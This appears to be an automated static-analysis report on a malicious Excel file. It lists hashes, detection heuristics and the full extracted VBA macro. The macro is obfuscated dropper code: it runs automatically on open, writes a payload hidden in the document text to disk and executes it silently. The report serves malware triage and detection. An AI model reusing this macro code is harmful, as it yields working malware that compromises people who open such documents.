Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 316bdce2ba996faa…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 30.5 KB
Created: 2020-06-13 08:08:44 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-04-25
MD5: 56000b870f1a1b6acdf8c8789db2e4b8
SHA-1: b801e40afce529c749aab6b39a1668a4046078c8
SHA-256: 316bdce2ba996faad618ecbc26be5ad2b81e5e56a3a93cda6fb892a3aa92d5ec
Risk score: 274

Heuristics (9)

  • ClamAV: Doc.Downloader.Generic-6698421-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA project inside OOXML [medium] OOXML_VBA (6 related findings)
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Matched line in script: iqMNfMciymt = Shell(UjlvuqKIHdBq, vbHide)
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    Matched line in script: Sub AutoOpen()
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Matched line in script: Sub Workbook_Open()
  • Auto_Open macro [low] OLE_VBA_AUTO
    Matched line in script: Sub Auto_Open()
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Matched line in script: oEEcKafXWM = Environ(ZEhUXsDsoWYHe(Array(188, ((2 Xor 5) + 1), (89 Xor 213), 250, ((1 Xor 2) + 180), ((26 Xor 213) + (17 Xor 48)), ((0 Xor 6) + (0 Xor 0))), (1 Xor 29)) & ZEhUXsDsoWYHe(Array(35, (25 + 26), ((13 Xor 26) + (204 Xor 16)), ((96 Xor 208) + 35)), ((8 Xor 43) + 0)))
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9515 bytes
SHA-256: 208d7313d0191647f0071b46ffed2ce896681903835889606a5f78ef60840ee5
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
Private XrulaBsYQOl       As Boolean
Private OpkIVWsYsjVQm((0 + (0 Xor 0)) To (27 Xor 36)) As Byte
Private SEyYJedjJBxv((0 + 0) To 127) As Byte
Sub Auto_Open()
ysFjSqAVJFMImt
End Sub
Sub ysFjSqAVJFMImt()
Dim iqMNfMciymt As Integer
Dim UQwqYykHUgzK As String
Dim oEEcKafXWM As String
Dim TNOtbmqbsTuYkf As Integer
Dim qTbUsdrBuQDJu As Paragraph
Dim sqRUJThqSc As Integer
Dim XdAYAIZcZJadlr As Boolean
Dim QIPOooOSvsZf As Integer
Dim LskvXAzGTeFjv As String
Dim zSpMnoIxBxtUNd As Byte
Dim VhvtTnjldRJJt As String
VhvtTnjldRJJt = ZEhUXsDsoWYHe(Array((90 Xor 234), (1 Xor 172), (44 Xor 28)), (0 Xor 0)) & ZEhUXsDsoWYHe(Array((86 Xor 33), (19 Xor 7), ((61 Xor 85) + (3 Xor 33)), (98 + 112), 93, (14 + 188), (89 + 27)), (3 Xor 0))
UQwqYykHUgzK = ZEhUXsDsoWYHe(Array((78 + 78), (154 Xor 1), (6 Xor 24), ((54 Xor 99) + 1), 83, ((39 Xor 126) + 12), (164 + 29)), 10) & ZEhUXsDsoWYHe(Array((30 Xor 236), (0 + 233), 176, ((1 Xor 3) + (0 Xor 7)), (54 + 119), (45 Xor 120), (50 + 55), (62 + 176), ((129 Xor 31) + (11 Xor 45)), (28 Xor 40), 175), 17)
oEEcKafXWM = Environ(ZEhUXsDsoWYHe(Array(188, ((2 Xor 5) + 1), (89 Xor 213), 250, ((1 Xor 2) + 180), ((26 Xor 213) + (17 Xor 48)), ((0 Xor 6) + (0 Xor 0))), (1 Xor 29)) & ZEhUXsDsoWYHe(Array(35, (25 + 26), ((13 Xor 26) + (204 Xor 16)), ((96 Xor 208) + 35)), ((8 Xor 43) + 0)))
ChDrive (oEEcKafXWM)
ChDir (oEEcKafXWM)
TNOtbmqbsTuYkf = FreeFile()
Open UQwqYykHUgzK For Binary As TNOtbmqbsTuYkf
For Each qTbUsdrBuQDJu In ActiveDocument.Paragraphs
DoEvents
LskvXAzGTeFjv = qTbUsdrBuQDJu.Range.Text
If (XdAYAIZcZJadlr = True) Then
sqRUJThqSc = (0 Xor 1)
While (sqRUJThqSc < Len(LskvXAzGTeFjv))
zSpMnoIxBxtUNd = Mid(LskvXAzGTeFjv, sqRUJThqSc, 4)
Put #TNOtbmqbsTuYkf, , zSpMnoIxBxtUNd
sqRUJThqSc = sqRUJThqSc + 4
Wend
ElseIf (InStr((0 Xor 1), LskvXAzGTeFjv, VhvtTnjldRJJt) > ((0 Xor 0) + 0) And Len(LskvXAzGTeFjv) > ((0 Xor 0) + (0 Xor 0))) Then
XdAYAIZcZJadlr = True
End If
Next
Close #TNOtbmqbsTuYkf
VdmEyIHJNTm (UQwqYykHUgzK)
End Sub
Sub VdmEyIHJNTm(UjlvuqKIHdBq As String)
Dim iqMNfMciymt As Integer
Dim oEEcKafXWM As String
oEEcKafXWM = Environ(ZEhUXsDsoWYHe(Array(((11 Xor 4) + (4 Xor 63)), (103 Xor 251), (64 + (84 Xor 218)), (66 + 60)), (38 + 1)) & ZEhUXsDsoWYHe(Array((117 Xor 224), (11 Xor 107), (24 + 219), (61 + 101), ((1 Xor 2) + 1), ((51 Xor 254) + 4), (35 + 26)), ((18 Xor 13) + 12)))
ChDrive (oEEcKafXWM)
ChDir (oEEcKafXWM)
iqMNfMciymt = Shell(UjlvuqKIHdBq, vbHide)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Public Function UxOukolzWbcM(ByVal awZORnGkGAJ As String) As Byte()
If Not XrulaBsYQOl Then aLzRDfqSYy
Dim NSUSywrZAzUs() As Byte: NSUSywrZAzUs = tktqrAGOEWt(awZORnGkGAJ)
Dim rApyFRJpIsWH As Long: rApyFRJpIsWH = UBound(NSUSywrZAzUs) + ((1 Xor 0) + (0 Xor 0))
If rApyFRJpIsWH Mod (2 + (0 Xor 2)) <> (0 Xor 0) Then Err.Raise vbObjectError, , ""
Do While rApyFRJpIsWH > 0
If NSUSywrZAzUs(rApyFRJpIsWH - 1) <> Asc("=") Then Exit Do
rApyFRJpIsWH = rApyFRJpIsWH - ((0 Xor 0) + 1)
Loop
Dim lBUiHVvWeJjd As Long: lBUiHVvWeJjd = (rApyFRJpIsWH * 3) \ (4 Xor 0)
Dim kpfdlmFugsWuN() As Byte
ReDim kpfdlmFugsWuN(((0 Xor 0) + (0 Xor 0)) To lBUiHVvWeJjd - (0 + 1)) As Byte
Dim ngWTfdXRUWL As Long
Dim symvazlvYcTy As Long
Do While ngWTfdXRUWL < rApyFRJpIsWH
Dim aoJdsYVKgwtt As Byte: aoJdsYVKgwtt = NSUSywrZAzUs(ngWTfdXRUWL): ngWTfdXRUWL = ngWTfdXRUWL + (0 + (1 Xor 0))
Dim EIWzhNQmIFxFll As Byte: EIWzhNQmIFxFll = NSUSywrZAzUs(ngWTfdXRUWL): ngWTfdXRUWL = ngWTfdXRUWL + (0 + (0 Xor 1))
Dim tXrnecmcqaXxYi As Byte: If ngWTfdXRUWL < rApyFRJpIsWH Then tXrnecmcqaXxYi = NSUSywrZAzUs(ngWTfdXRUWL): ngWTfdXRUWL = ngWTfdXRUWL + 1 Else tXrnecmcqaXxYi = Asc("A")
Dim bYSOfmpQYCL As Byte: If ngWTfdXRUWL < rApyFRJpIsWH Then bYSOfmpQYCL = NSUSywrZAzUs(ngWTfdXRUWL): ngWTfdXRUWL = ngWTfdXRUWL + (0 + 1) Else bYSOfmpQYCL = Asc("A")
If aoJdsYVKgwtt > (11 + 116) Or EIWzhNQmIFxFll > (103 Xor 24) Or tXrnecmcqaXxYi > (103 Xor 24) Or bYSOfmpQYCL > ((11 Xor 67) + (43 Xor 28)) Then _
Err.Raise vbObjectError, , ""
Dim qgtOOiPrlhIx As Byte: qgtOOiPrlhIx = SEyYJedjJBxv(aoJdsYVKgwtt)
Dim VdvNJEMLNYJT As Byte: VdvNJEMLNYJT = SEyYJedjJBxv(EIWzhNQmIFxFll)
Dim UMhGjiXDGyIt As Byte: UMhGjiXDGyIt = SEyYJedjJBxv(tXrnecmcqaXxYi)
Dim bcjCqVmaMYA As Byte: bcjCqVmaMYA = SEyYJedjJBxv(bYSOfmpQYCL)
If qgtOOiPrlhIx > ((24 Xor 2) + 37) Or VdvNJEMLNYJT > (63 + 0) Or UMhGjiXDGyIt > 63 Or bcjCqVmaMYA > (8 + 55) Then _
Err.Raise vbObjectError, , ""
Dim pbfDoigJnLHmv As Byte: pbfDoigJnLHmv = (qgtOOiPrlhIx * (1 + (1 Xor 2))) Or (VdvNJEMLNYJT \ &H10)
Dim fLlkgWKAiPhZH As Byte: fLlkgWKAiPhZH = ((VdvNJEMLNYJT And &HF) * &H10) Or (UMhGjiXDGyIt \ (4 + (0 Xor 0)))
Dim gzFjFdCVPSP As Byte: gzFjFdCVPSP = ((UMhGjiXDGyIt And (3 + 0)) * &H40) Or bcjCqVmaMYA
kpfdlmFugsWuN(symvazlvYcTy) = pbfDoigJnLHmv: symvazlvYcTy = symvazlvYcTy + 1
If symvazlvYcTy < lBUiHVvWeJjd Then kpfdlmFugsWuN(symvazlvYcTy) = fLlkgWKAiPhZH: symvazlvYcTy = symvazlvYcTy + (0 Xor 1)
If symvazlvYcTy < lBUiHVvWeJjd Then kpfdlmFugsWuN(symvazlvYcTy) = gzFjFdCVPSP: symvazlvYcTy = symvazlvYcTy + (0 Xor 1)
Loop
UxOukolzWbcM = kpfdlmFugsWuN
End Function
Private Sub aLzRDfqSYy()
Dim ssaTdUUgQRIdsw As Integer, eUCvYZpkHkcBQ As Integer
eUCvYZpkHkcBQ = (0 + 0)
For ssaTdUUgQRIdsw = Asc("A") To Asc("Z"): OpkIVWsYsjVQm(eUCvYZpkHkcBQ) = ssaTdUUgQRIdsw: eUCvYZpkHkcBQ = eUCvYZpkHkcBQ + 1: Next
For ssaTdUUgQRIdsw = Asc("a") To Asc("z"): OpkIVWsYsjVQm(eUCvYZpkHkcBQ) = ssaTdUUgQRIdsw: eUCvYZpkHkcBQ = eUCvYZpkHkcBQ + ((0 Xor 0) + 1): Next
For ssaTdUUgQRIdsw = Asc("0") To Asc("9"): OpkIVWsYsjVQm(eUCvYZpkHkcBQ) = ssaTdUUgQRIdsw: eUCvYZpkHkcBQ = eUCvYZpkHkcBQ + (0 + (0 Xor 1)): Next
OpkIVWsYsjVQm(eUCvYZpkHkcBQ) = Asc("+"): eUCvYZpkHkcBQ = eUCvYZpkHkcBQ + (0 + 1)
OpkIVWsYsjVQm(eUCvYZpkHkcBQ) = Asc("/"): eUCvYZpkHkcBQ = eUCvYZpkHkcBQ + (0 + (0 Xor 1))
For eUCvYZpkHkcBQ = (0 Xor 0) To (56 + 71): SEyYJedjJBxv(eUCvYZpkHkcBQ) = (92 + (94 Xor 253)): Next
For eUCvYZpkHkcBQ = 0 To 63: SEyYJedjJBxv(OpkIVWsYsjVQm(eUCvYZpkHkcBQ)) = eUCvYZpkHkcBQ: Next
XrulaBsYQOl = True
End Sub
Private Function tktqrAGOEWt(ByVal awZORnGkGAJ As String) As Byte()
Dim VdvNJEMLNYJT() As Byte: VdvNJEMLNYJT = awZORnGkGAJ
Dim IJYSeTzKbHxG As Long: IJYSeTzKbHxG = (UBound(VdvNJEMLNYJT) + 1) \ 2
If IJYSeTzKbHxG = 0 Then tktqrAGOEWt = VdvNJEMLNYJT: Exit Function
Dim UMhGjiXDGyIt() As Byte
ReDim UMhGjiXDGyIt(((0 Xor 0) + (0 Xor 0)) To IJYSeTzKbHxG - (0 Xor 1)) As Byte
Dim VcbBAhzgHTdzV As Long
For VcbBAhzgHTdzV = (0 Xor 0) To IJYSeTzKbHxG - (1 Xor 0)
Dim ssaTdUUgQRIdsw As Long: ssaTdUUgQRIdsw = VdvNJEMLNYJT(2 * VcbBAhzgHTdzV) + 256 * CLng(VdvNJEMLNYJT(((2 Xor 0) + (0 Xor 0)) * VcbBAhzgHTdzV + 1))
If ssaTdUUgQRIdsw >= ((171 Xor 103) + 52) Then ssaTdUUgQRIdsw = Asc("?")
UMhGjiXDGyIt(VcbBAhzgHTdzV) = ssaTdUUgQRIdsw
Next
tktqrAGOEWt = UMhGjiXDGyIt
End Function
Private Function ZEhUXsDsoWYHe(wIqFnFMGIALqK As Variant, FSHZRvybVS As Integer)
Dim dAsFQiGsHPNQlA As String
Dim UUYNHTLpdFiK() As Byte
UUYNHTLpdFiK = UxOukolzWbcM("5c5WBHX4oy2/EP/6aSwqL6CQoP5f5xAqwKFMyulbyajnokller+WH8+LLMUyvORNnXg=")
dAsFQiGsHPNQlA = ""
For eUCvYZpkHkcBQ = LBound(wIqFnFMGIALqK) To UBound(wIqFnFMGIALqK)
dAsFQiGsHPNQlA = dAsFQiGsHPNQlA & Chr(UUYNHTLpdFiK(eUCvYZpkHkcBQ + FSHZRvybVS) Xor wIqFnFMGIALqK(eUCvYZpkHkcBQ))
Next
ZEhUXsDsoWYHe = dAsFQiGsHPNQlA
End Function


Attribute VB_Name = "Module2"





Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit

Private Sub Worksheet_SelectionChange(ByVal Target As Range)
    If Selection.Count = 1 Then
        If Not Intersect(Target, Range("D420")) Is Nothing Then
            Call ghd
        End If
    End If
End Sub






Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False




Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False





Attribute VB_Name = "ThisWorkbook1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False




Attribute VB_Name = "ThisWorkbook2"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Filename | Kind | Source | Size
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 54272 bytes
SHA-256: 74c5d14853005cebe39eef7606c2837f7d16e792872dac6c03706855007f7651
Detection
ClamAV: Doc.Downloader.Generic-6698421-0
Obfuscation or payload: likely
421 of 626 identifiers look randomly generated (e.g. 'MqsvsuNwj0Bn3kDf4kCHgFNWhJZoQTnRFRSuig5Y') — consistent with name-mangling obfuscation.